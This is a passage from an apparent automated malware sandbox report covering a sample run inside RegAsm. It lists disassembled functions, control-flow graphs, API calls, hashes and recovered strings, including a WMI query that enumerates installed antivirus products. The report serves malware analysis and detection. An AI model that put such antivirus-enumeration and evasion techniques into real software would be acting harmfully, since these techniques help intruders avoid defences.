                                                                                                                                                                                                                                  • __aulldiv.LIBCMT ref: 00430B99
                                                                                                                                                                                                                                    • Part of subcall function 0041FB00: __aulldiv.LIBCMT ref: 0041FB82
                                                                                                                                                                                                                                  • __fread_nolock.LIBCMT ref: 00430C3F
                                                                                                                                                                                                                                  • __aulldiv.LIBCMT ref: 00430CAB
                                                                                                                                                                                                                                    • Part of subcall function 0041FBD0: __aulldiv.LIBCMT ref: 0041FC38
                                                                                                                                                                                                                                    • Part of subcall function 0041FBD0: __aulldiv.LIBCMT ref: 0041FC81
                                                                                                                                                                                                                                  • __aulldiv.LIBCMT ref: 00430DE5
                                                                                                                                                                                                                                  • __aulldiv.LIBCMT ref: 00430F1A
                                                                                                                                                                                                                                  • __aulldiv.LIBCMT ref: 004310DA
                                                                                                                                                                                                                                  • __fread_nolock.LIBCMT ref: 00431131
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000003.00000002.1827502764.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: __aulldiv$__fread_nolock
                                                                                                                                                                                                                                  • String ID: eks$j3l6lrek$u
                                                                                                                                                                                                                                  • API String ID: 3493607940-2906203254
                                                                                                                                                                                                                                  • Opcode ID: de1ec93fdc245c52fc8053d81eec165ec062ba87709c864b29ee0b4f7d1792e9
                                                                                                                                                                                                                                  • Instruction ID: ed82bb78abdf7bbcf2c54842750a728aaef47426149999f07c8a46fe1ccb441f
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: de1ec93fdc245c52fc8053d81eec165ec062ba87709c864b29ee0b4f7d1792e9
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 13B2C0B1E002189FDB24DB64CC91BEEBBB5BF89304F0481A9E509A7391DB346E85CF55
                                                                                                                                                                                                                                  Function 004317E0 Relevance: 29.2, APIs: 13, Strings: 3, Instructions: 1186COMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  control_flow_graph 2466 4317e0-43180d call 41b910 2469 431810-431820 2466->2469 2469->2469 2470 431822-43196d call 41a1e0 call 5672b0 call 567190 call 414fd0 2469->2470 2479 4319a4-4319ac call 41bb40 2470->2479 2480 43196f-431976 2470->2480 2485 4319b1-4319b8 2479->2485 2481 431981 2480->2481 2482 431978-43197f 2480->2482 2484 431988-43198e 2481->2484 2482->2484 2484->2479 2486 431990-4319a2 call 414e70 2484->2486 2487 4319c3 2485->2487 2488 4319ba-4319c1 2485->2488 2486->2485 2489 4319ca-4319d0 2487->2489 2488->2489 2491 4319d2-4319ec call 4ef210 2489->2491 2492 431a2a-431a51 call 417140 2489->2492 2498 4319f2-431a02 2491->2498 2499 431a5c-431a60 2492->2499 2498->2498 2500 431a04-431a25 call 4172e0 2498->2500 2501 431a62-431a97 2499->2501 2502 431a99-431ae8 call 414d00 call 54f78c 2499->2502 2500->2492 2501->2499 2509 431aee-431cdf call 5672b0 * 2 call 41fb00 call 5672b0 call 567190 call 5672b0 * 2 call 41fb00 call 55012d 2502->2509 2510 4322ac-4322c3 call 417140 * 2 2502->2510 2533 431ce4-431d97 call 5672b0 * 3 call 567190 call 41fbd0 2509->2533 2519 432870-432876 2510->2519 2544 431da7-431dca call 54f8c8 call 417140 * 2 2533->2544 2545 431d99-431da5 2533->2545 2544->2519 2545->2544 2546 431dcf-43206b call 5672b0 * 2 call 41fb00 call 5672b0 * 3 call 567190 call 41fbd0 call 54fc1b call 54f66e call 5672b0 call 567190 call 5672b0 * 2 call 41fb00 call 54fc1b 2545->2546 2585 43207b-432087 call 41bba0 2546->2585 2586 43206d-432079 call 41bb40 2546->2586 2590 43208c-4321ee call 5672b0 call 567190 call 414d00 call 55012d 2585->2590 2586->2590 2599 4321f0-432204 call 53f1aa 2590->2599 2600 43222a-432242 2590->2600 2599->2600 2609 432206-432227 call 41f450 call 53f0da call 53f159 2599->2609 2601 432294-432299 call 4ee6c0 2600->2601 2602 432244-432292 call 4fb3b0 call 4f57c0 2600->2602 2608 43229e-43249c call 54f8c8 call 414e10 call 5672b0 * 2 call 41fb00 call 414e10 call 4ef310 call 5672b0 * 3 call 567190 call 41fbd0 call 5672b0 * 2 call 41fb00 2601->2608 2602->2608 2650 4324a2-4324b3 call 414d50 2608->2650 2651 432600-43265f call 5672b0 * 2 call 41fb00 2608->2651 2609->2600 2656 4324b5-4324c4 call 414d50 2650->2656 2657 4324c9-4324db call 414d50 2650->2657 2671 43266a-432670 2651->2671 2665 4325fb 2656->2665 2666 4324f1-432503 call 414d50 2657->2666 2667 4324dd-4324ec call 414d50 2657->2667 2665->2651 2678 432505-432514 call 414d50 2666->2678 2679 432519-43252b call 414d50 2666->2679 2667->2665 2672 432676-43271f call 5672b0 * 3 call 567190 call 41fbd0 call 414d50 2671->2672 2673 432724-432749 call 414d00 CreateFileA 2671->2673 2672->2671 2684 43274b-432779 call 414d00 WriteFile CloseHandle 2673->2684 2685 43277f-432793 2673->2685 2678->2665 2693 432541-432553 call 414d50 2679->2693 2694 43252d-43253c call 414d50 2679->2694 2684->2685 2690 432795-4327a9 call 53f1aa 2685->2690 2691 4327cf-4327e7 2685->2691 2690->2691 2710 4327ab-4327cc call 41f450 call 53f0da call 53f159 2690->2710 2700 4327e9-43284d call 4f57c0 2691->2700 2701 43284f-432854 call 4ee6c0 2691->2701 2712 432555-432564 call 414d50 2693->2712 2713 432569-43257b call 414d50 2693->2713 2694->2665 2709 432859-43286d call 417140 * 2 2700->2709 2701->2709 2709->2519 2710->2691 2712->2665 2724 43258e-4325a0 call 414d50 2713->2724 2725 43257d-43258c call 414d50 2713->2725 2738 4325b3-4325c5 call 414d50 2724->2738 2739 4325a2-4325b1 call 414d50 2724->2739 2725->2665 2746 4325c7-4325d6 call 414d50 2738->2746 2747 4325d8-4325ea call 414d50 2738->2747 2739->2665 2746->2665 2747->2665 2752 4325ec-4325f8 call 414d50 2747->2752 2752->2665
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • __aulldiv.LIBCMT ref: 0043192A
                                                                                                                                                                                                                                  • __aulldiv.LIBCMT ref: 00431C39
                                                                                                                                                                                                                                    • Part of subcall function 0041FB00: __aulldiv.LIBCMT ref: 0041FB82
                                                                                                                                                                                                                                  • __fread_nolock.LIBCMT ref: 00431CDF
                                                                                                                                                                                                                                  • __aulldiv.LIBCMT ref: 00431D4B
                                                                                                                                                                                                                                    • Part of subcall function 0041FBD0: __aulldiv.LIBCMT ref: 0041FC38
                                                                                                                                                                                                                                    • Part of subcall function 0041FBD0: __aulldiv.LIBCMT ref: 0041FC81
                                                                                                                                                                                                                                  • __aulldiv.LIBCMT ref: 00431E85
                                                                                                                                                                                                                                  • __aulldiv.LIBCMT ref: 00431FBA
                                                                                                                                                                                                                                  • __aulldiv.LIBCMT ref: 0043217A
                                                                                                                                                                                                                                  • __fread_nolock.LIBCMT ref: 004321D1
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000003.00000002.1827502764.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: __aulldiv$__fread_nolock
                                                                                                                                                                                                                                  • String ID: (ZJ$eks$j3l6lrek
                                                                                                                                                                                                                                  • API String ID: 3493607940-3988229910
                                                                                                                                                                                                                                  • Opcode ID: c3d8d032b3a525433ee9a6c064fa85cdcb634d6fe42baf7d06e080480553864f
                                                                                                                                                                                                                                  • Instruction ID: 3febfb47fdc92599cddc4016dfe3e7c600fe40ff91a5eff04d31f94f3ff2dda5
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c3d8d032b3a525433ee9a6c064fa85cdcb634d6fe42baf7d06e080480553864f
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 87B2D0B1E002189FDB24DB64CC91BEEBBB5BF89304F1481A9E409A7391DB346E85CF55
                                                                                                                                                                                                                                  Function 00433600 Relevance: 24.7, APIs: 9, Strings: 5, Instructions: 226COMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  control_flow_graph 2755 433600-43361a CoInitializeEx 2756 433621-433640 CoInitializeSecurity 2755->2756 2757 43361c 2755->2757 2759 433642-433648 CoUninitialize 2756->2759 2760 43364d-433673 CoCreateInstance 2756->2760 2758 4338d6-4338d9 2757->2758 2759->2758 2761 433675-433679 2760->2761 2762 43367b-433681 CoUninitialize 2760->2762 2761->2762 2763 433686-4336ae call 41f8a0 2761->2763 2762->2758 2766 4336b0-4336ba 2763->2766 2767 4336bc 2763->2767 2768 4336c3-4336eb 2766->2768 2767->2768 2770 4336ed-4336f5 call 41f930 2768->2770 2771 4336fc-433700 2768->2771 2770->2771 2773 433702-433706 2771->2773 2774 433708-43370e CoUninitialize 2771->2774 2773->2774 2776 433713-43373b call 41f830 2773->2776 2774->2758 2779 433749 2776->2779 2780 43373d-433747 2776->2780 2781 433750-43376c call 41f830 2779->2781 2780->2781 2784 43377a 2781->2784 2785 43376e-433778 2781->2785 2786 433781-4337a5 2784->2786 2785->2786 2788 4337a7-4337af call 41f930 2786->2788 2789 4337b6-4337ba 2786->2789 2788->2789 2791 4337cb-4337cf 2789->2791 2792 4337bc-4337c4 call 41f930 2789->2792 2795 4337d1-4337d5 2791->2795 2796 4337d7-4337dd CoUninitialize 2791->2796 2792->2791 2795->2796 2798 4337e2-4337e9 2795->2798 2796->2758 2799 4338d0 CoUninitialize 2798->2799 2800 4337ef-433822 2798->2800 2799->2758 2802 433824-433828 2800->2802 2803 43382a 2800->2803 2802->2803 2804 43382f-433857 2802->2804 2803->2799 2806 433859-4338b7 call 541c00 call 41f490 call 414fd0 call 4f5470 call 417140 VariantClear 2804->2806 2807 4338bd-4338cb 2804->2807 2806->2807 2807->2798
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • CoInitializeEx.COMBASE(00000000,00000002), ref: 0043360D
                                                                                                                                                                                                                                  • CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 00433633
                                                                                                                                                                                                                                  • CoUninitialize.OLE32 ref: 00433642
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000003.00000002.1827502764.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Initialize$SecurityUninitialize
                                                                                                                                                                                                                                  • String ID: %ws$ROOT\SecurityCenter2$Select * From AntiVirusProduct$WQL$displayName
                                                                                                                                                                                                                                  • API String ID: 3757020523-4229669714
                                                                                                                                                                                                                                  • Opcode ID: 9b520030e4c47e93ac29de0eb23aad94cd7036f6d94f8618cecfea0a68961ab4
                                                                                                                                                                                                                                  • Instruction ID: 248eaa1abccf262ec5addea588efc0091001d51c6a96fc74f562b6610ee92897
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9b520030e4c47e93ac29de0eb23aad94cd7036f6d94f8618cecfea0a68961ab4
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 08A1F7B4E00209EFDB14DF94C985BEEBBB5BB48305F20815AE5126B390D7B86A45CF54
                                                                                                                                                                                                                                  Function 00434D40 Relevance: 22.5, APIs: 3, Strings: 9, Instructions: 1456COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000003.00000002.1827502764.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: __aulldiv
                                                                                                                                                                                                                                  • String ID: L85<)$b$eks$j3l6lrek$m$ongjr$q$w$~mxl
                                                                                                                                                                                                                                  • API String ID: 3732870572-2218426398
                                                                                                                                                                                                                                  • Opcode ID: 3476901763a0525fa2c20e11f6db4d64a1f902c9d48d51e5a60dab42c2689e38
                                                                                                                                                                                                                                  • Instruction ID: 38a92d830e6c4dd0b9ec2749629d1db253707dd2fe5655ce0909aa02115304b7
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3476901763a0525fa2c20e11f6db4d64a1f902c9d48d51e5a60dab42c2689e38
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 77E26770D042689BDB24DB64CC95BEEBBB5BF49304F0481EAE509A7381DB382E85CF55
                                                                                                                                                                                                                                  Function 00509BD0 Relevance: 20.3, APIs: 10, Strings: 1, Instructions: 1016COMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  control_flow_graph 3259 509bd0-509bfa call 50ac10 3262 509c05-509c09 3259->3262 3263 509c4a-509c92 call 50aba0 3262->3263 3264 509c0b-509c48 3262->3264 3268 509c9d-509ca1 3263->3268 3264->3262 3269 509ce2-509d4c GetModuleHandleA call 5094a0 call 50ad00 3268->3269 3270 509ca3-509ce0 3268->3270 3276 509d57-509d5b 3269->3276 3270->3268 3277 509d9c-509de4 call 50ac90 3276->3277 3278 509d5d-509d9a 3276->3278 3282 509def-509df3 3277->3282 3278->3276 3283 509e34-509e9e GetModuleHandleA call 5094a0 call 50ae20 3282->3283 3284 509df5-509e32 3282->3284 3290 509ea9-509ead 3283->3290 3284->3282 3291 509eee-509f36 call 50adb0 3290->3291 3292 509eaf-509eec 3290->3292 3296 509f41-509f45 3291->3296 3292->3290 3297 509f86-509ff0 GetModuleHandleA call 5094a0 call 50af00 3296->3297 3298 509f47-509f84 3296->3298 3304 509ffb-509fff 3297->3304 3298->3296 3305 50a040-50a088 call 50ae90 3304->3305 3306 50a001-50a03e 3304->3306 3310 50a093-50a097 3305->3310 3306->3304 3311 50a0d8-50a142 GetModuleHandleA call 5094a0 call 50b010 3310->3311 3312 50a099-50a0d6 3310->3312 3318 50a14d-50a151 3311->3318 3312->3310 3319 50a192-50a1da call 50afa0 3318->3319 3320 50a153-50a190 3318->3320 3324 50a1e5-50a1e9 3319->3324 3320->3318 3325 50a22a-50a297 GetModuleHandleA call 5094a0 call 50b150 3324->3325 3326 50a1eb-50a228 3324->3326 3332 50a2a2-50a2a6 3325->3332 3326->3324 3333 50a2f0-50a344 call 50b0e0 3332->3333 3334 50a2a8-50a2ee 3332->3334 3338 50a355-50a35c 3333->3338 3334->3332 3339 50a3ac-50a422 GetModuleHandleA call 5094a0 call 50b260 3338->3339 3340 50a35e-50a3aa 3338->3340 3346 50a433-50a43a 3339->3346 3340->3338 3347 50a48a-50a4de call 50b1f0 3346->3347 3348 50a43c-50a488 3346->3348 3352 50a4ef-50a4f6 3347->3352 3348->3346 3353 50a546-50a5bc GetModuleHandleA call 5094a0 call 50b390 3352->3353 3354 50a4f8-50a544 3352->3354 3360 50a5cd-50a5d4 3353->3360 3354->3352 3361 50a624-50a678 call 50b320 3360->3361 3362 50a5d6-50a622 3360->3362 3366 50a689-50a690 3361->3366 3362->3360 3367 50a6e0-50a756 GetModuleHandleA call 5094a0 call 50b490 3366->3367 3368 50a692-50a6de 3366->3368 3374 50a767-50a76e 3367->3374 3368->3366 3375 50a770-50a7bc 3374->3375 3376 50a7be-50a812 call 50b420 3374->3376 3375->3374 3380 50a823-50a82a 3376->3380 3381 50a87a-50a8f0 GetModuleHandleA call 5094a0 call 50b530 3380->3381 3382 50a82c-50a878 3380->3382 3388 50a901-50a908 3381->3388 3382->3380 3389 50a958-50a9ac call 50afa0 3388->3389 3390 50a90a-50a956 3388->3390 3394 50a9bd-50a9c4 3389->3394 3390->3388 3395 50aa14-50aaa3 GetModuleHandleA call 5094a0 call 41b910 call 417560 call 509930 3394->3395 3396 50a9c6-50aa12 3394->3396 3406 50ab56-50ab8e call 417140 * 3 call 4f22b0 3395->3406 3407 50aaa9-50aaba call 509990 3395->3407 3396->3394 3407->3406 3413 50aac0-50aae9 call 4150c0 * 2 call 50b5d0 3407->3413 3413->3406 3425 50aaeb-50ab3a call 4ee930 * 2 call 4eee70 call 509a00 3413->3425 3425->3406 3434 50ab3c-50ab51 call 509af0 3425->3434 3434->3406
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetModuleHandleA.KERNEL32(?,?,?), ref: 00509D07
                                                                                                                                                                                                                                  • GetModuleHandleA.KERNEL32(?,?,?), ref: 00509E59
                                                                                                                                                                                                                                  • GetModuleHandleA.KERNEL32(?,?,?), ref: 00509FAB
                                                                                                                                                                                                                                  • GetModuleHandleA.KERNEL32(?,?,?), ref: 0050A0FD
                                                                                                                                                                                                                                  • GetModuleHandleA.KERNEL32(?,?,?), ref: 0050A24F
                                                                                                                                                                                                                                  • GetModuleHandleA.KERNEL32(?,?,?), ref: 0050A3D7
                                                                                                                                                                                                                                  • GetModuleHandleA.KERNEL32(?,?,?), ref: 0050A571
                                                                                                                                                                                                                                  • GetModuleHandleA.KERNEL32(?,?,?), ref: 0050A70B
                                                                                                                                                                                                                                  • GetModuleHandleA.KERNEL32(?,?,?), ref: 0050A8A5
                                                                                                                                                                                                                                  • GetModuleHandleA.KERNEL32(?,?,?), ref: 0050AA3F
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000003.00000002.1827502764.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: HandleModule
                                                                                                                                                                                                                                  • String ID: EC
                                                                                                                                                                                                                                  • API String ID: 4139908857-2263498742
                                                                                                                                                                                                                                  • Opcode ID: 683267271ca8c002a4c1b82dee1c82163676ba593cbdfcd5a446630a53268e73
                                                                                                                                                                                                                                  • Instruction ID: 4cfcad33a6ec3e9e5b8220c0090680f0983b62376599e87d6b0b2d17304a9462
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 683267271ca8c002a4c1b82dee1c82163676ba593cbdfcd5a446630a53268e73
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 22B20270D052688FDB25CF68CC90BEEBBB1BF8A308F1481D9D449AB346D6316A84DF55
                                                                                                                                                                                                                                  Function 0046D6E0 Relevance: 15.6, APIs: 2, Strings: 5, Instructions: 3312COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000003.00000002.1827502764.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: __aulldiv
                                                                                                                                                                                                                                  • String ID: %$&$'$)$3
                                                                                                                                                                                                                                  • API String ID: 3732870572-1175896778
                                                                                                                                                                                                                                  • Opcode ID: 550d6f57913880df0957e0fc038ac1eb2b51d2ce00f759a05158a6b34fdd039d
                                                                                                                                                                                                                                  • Instruction ID: d693b51815b6c67d81b492c7bdbd45a3678860fb9b1bd3b496e743534c1d8fd4
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 550d6f57913880df0957e0fc038ac1eb2b51d2ce00f759a05158a6b34fdd039d
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8C83EF70D052688FCB65CB28CC90BEEBBB1BF89308F0481DAD54DA7252DA356E85CF55
                                                                                                                                                                                                                                  Function 004366C0 Relevance: 15.2, APIs: 2, Strings: 6, Instructions: 1184COMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  control_flow_graph 4227 4366c0-4366e7 4228 436723-436744 4227->4228 4229 4366e9-4366fd call 53f1aa 4227->4229 4231 436746-43679d call 4fb3b0 call 4f57c0 4228->4231 4232 43679f-4367a4 call 4ee6c0 4228->4232 4229->4228 4237 4366ff-436720 call 41f450 call 53f0da call 53f159 4229->4237 4236 4367a9-4367cb call 41f450 4231->4236 4232->4236 4245 436807-436828 4236->4245 4246 4367cd-4367e1 call 53f1aa 4236->4246 4237->4228 4248 436883-436888 call 4ee6c0 4245->4248 4249 43682a-436881 call 4fb3b0 call 4f57c0 4245->4249 4246->4245 4258 4367e3-436804 call 41f450 call 53f0da call 53f159 4246->4258 4257 43688d-4368a5 4248->4257 4249->4257 4261 4368b0-4368b4 4257->4261 4258->4245 4264 4368b6-4368eb 4261->4264 4265 4368ed-436929 4261->4265 4264->4261 4269 436934-436938 4265->4269 4271 436971-4369b3 call 437970 4269->4271 4272 43693a-43696f 4269->4272 4278 4369be-4369c2 4271->4278 4272->4269 4279 436a03-436a50 call 4187e0 4278->4279 4280 4369c4-436a01 4278->4280 4284 436a56-436a66 4279->4284 4280->4278 4284->4284 4285 436a68-436ad2 call 417380 call 414f60 call 414e70 call 414f60 4284->4285 4294 436ad8-436ae8 4285->4294 4294->4294 4295 436aea-436b4a call 417380 call 414f60 call 414e70 call 414f60 call 433be0 4294->4295 4305 436b4f-436ba1 call 417140 * 4 call 414fd0 4295->4305 4316 436ba3-436baa 4305->4316 4317 436be1-436be9 call 41bb40 4305->4317 4319 436bb8 4316->4319 4320 436bac-436bb6 4316->4320 4321 436bee-436bf5 4317->4321 4322 436bc2-436bcb 4319->4322 4320->4322 4323 436c03 4321->4323 4324 436bf7-436c01 4321->4324 4322->4317 4325 436bcd-436bdf call 414e70 4322->4325 4326 436c0d-436c16 4323->4326 4324->4326 4325->4321 4328 436c70-436c8e call 417140 4326->4328 4329 436c18-436c32 call 4ef210 4326->4329 4336 436c94-436cb6 call 4379f0 4328->4336 4337 436dbf 4328->4337 4335 436c38-436c48 4329->4335 4335->4335 4340 436c4a-436c6b call 4172e0 4335->4340 4345 436cc1-436cc5 4336->4345 4339 436dc9-436dd8 4337->4339 4342 436dda-436de4 call 417140 4339->4342 4343 436de9-436def 4339->4343 4340->4328 4342->4343 4347 437942-437966 call 417140 * 3 4343->4347 4348 436df5-436e0a 4343->4348 4349 436cc7-436d04 4345->4349 4350 436d06-436d56 call 41b910 4345->4350 4351 436e46-436e67 4348->4351 4352 436e0c-436e20 call 53f1aa 4348->4352 4349->4345 4368 436d5c-436d6c 4350->4368 4354 436ec5-436eca call 4ee6c0 4351->4354 4355 436e69-436ec3 call 4fb3b0 call 4f57c0 4351->4355 4352->4351 4369 436e22-436e43 call 41f450 call 53f0da call 53f159 4352->4369 4367 436ecf-436f1c call 4f47f0 4354->4367 4355->4367 4380 436f58-436f79 4367->4380 4381 436f1e-436f32 call 53f1aa 4367->4381 4368->4368 4373 436d6e-436db1 call 41a1e0 call 4f4730 4368->4373 4369->4351 4373->4337 4397 436db3-436dbd 4373->4397 4384 436fd7-436fdc call 4ee6c0 4380->4384 4385 436f7b-436fd5 call 4fb3b0 call 4f57c0 4380->4385 4381->4380 4396 436f34-436f55 call 41f450 call 53f0da call 53f159 4381->4396 4395 436fe1-43705c call 4ed810 call 4ed7d0 call 4f35f0 4384->4395 4385->4395 4414 43706a 4395->4414 4415 43705e-437068 4395->4415 4396->4380 4397->4339 4416 437074-43707d 4414->4416 4415->4416 4417 437083-4370c5 call 436600 call 4f36a0 4416->4417 4418 43781d-43785e call 417140 * 4 4416->4418 4428 4370d0-4370d4 4417->4428 4438 437860-437874 call 53f1aa 4418->4438 4439 43789a-4378bb 4418->4439 4430 4370d6-43710b 4428->4430 4431 43710d-43718a call 4f4600 call 4f48c0 call 4f36a0 call 437a40 4428->4431 4430->4428 4460 437195-437199 4431->4460 4438->4439 4451 437876-437897 call 41f450 call 53f0da call 53f159 4438->4451 4441 437919-43791e call 4ee6c0 4439->4441 4442 4378bd-437917 call 4fb3b0 call 4f57c0 4439->4442 4450 437923-43793d call 4f1460 4441->4450 4442->4450 4450->4347 4451->4439 4462 43719b-4371d8 4460->4462 4463 4371da-437299 call 4f4600 call 41b910 call 417560 call 506eb0 call 41b910 call 417560 4460->4463 4462->4460 4479 43729b-43730c call 5672b0 * 2 call 41fb00 4463->4479 4480 43730e-43731a 4463->4480 4481 437320-437348 call 414d00 call 420e20 4479->4481 4480->4481 4491 437472-4374ac call 417140 call 4f36a0 call 437a90 4481->4491 4492 43734e-437350 4481->4492 4514 4374b7-4374bb 4491->4514 4495 437352-437364 4492->4495 4496 437369-4373e9 call 5672b0 * 3 call 567190 call 41fbd0 4492->4496 4498 4373ef-43740c call 4210e0 4495->4498 4496->4498 4507 437463-43746f call 54eeae 4498->4507 4508 43740e-43741a 4498->4508 4507->4491 4511 437420-437430 4508->4511 4511->4511 4515 437432-437460 call 4172e0 call 54eeae 4511->4515 4518 4374bd-4374fa 4514->4518 4519 4374fc-4375bb call 4f4600 call 41b910 call 417560 call 506eb0 call 41b910 call 417560 4514->4519 4515->4507 4518->4514 4541 437630-43763c 4519->4541 4542 4375bd-43762e call 5672b0 * 2 call 41fb00 4519->4542 4544 437642-43766a call 414d00 call 420e20 4541->4544 4542->4544 4553 437670-437672 4544->4553 4554 437794-437818 call 417140 call 4fb680 call 4f4f10 call 437ae0 call 417140 * 5 4544->4554 4556 437674-437686 4553->4556 4557 43768b-43770b call 5672b0 * 3 call 567190 call 41fbd0 4553->4557 4554->4418 4559 437711-43772e call 4210e0 4556->4559 4557->4559 4569 437730-43773c 4559->4569 4570 437785-437791 call 54eeae 4559->4570 4573 437742-437752 4569->4573 4570->4554 4573->4573 4577 437754-437782 call 4172e0 call 54eeae 4573->4577 4577->4570
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000003.00000002.1827502764.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ExclusiveLock$AcquireRelease$ConditionVariableWake
                                                                                                                                                                                                                                  • String ID: :$F$eks$j3l6lrek$l$q
                                                                                                                                                                                                                                  • API String ID: 4258034872-2840958074
                                                                                                                                                                                                                                  • Opcode ID: ac35155b3cf5cc073ab36f7b3c1dece5b87a1f1fe7dc10e2659f067a3425c365
                                                                                                                                                                                                                                  • Instruction ID: 7cc07ffcf6b3f84739c149508f85475ee936f78321432c080d54a692821b2c2d
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ac35155b3cf5cc073ab36f7b3c1dece5b87a1f1fe7dc10e2659f067a3425c365
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 40C288B0D042289BDB24DB64CC91BEEBBB5BF49304F0481EAE50A67341DB386E85CF55
                                                                                                                                                                                                                                  Function 00433BE0 Relevance: 14.9, APIs: 3, Strings: 5, Instructions: 892COMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
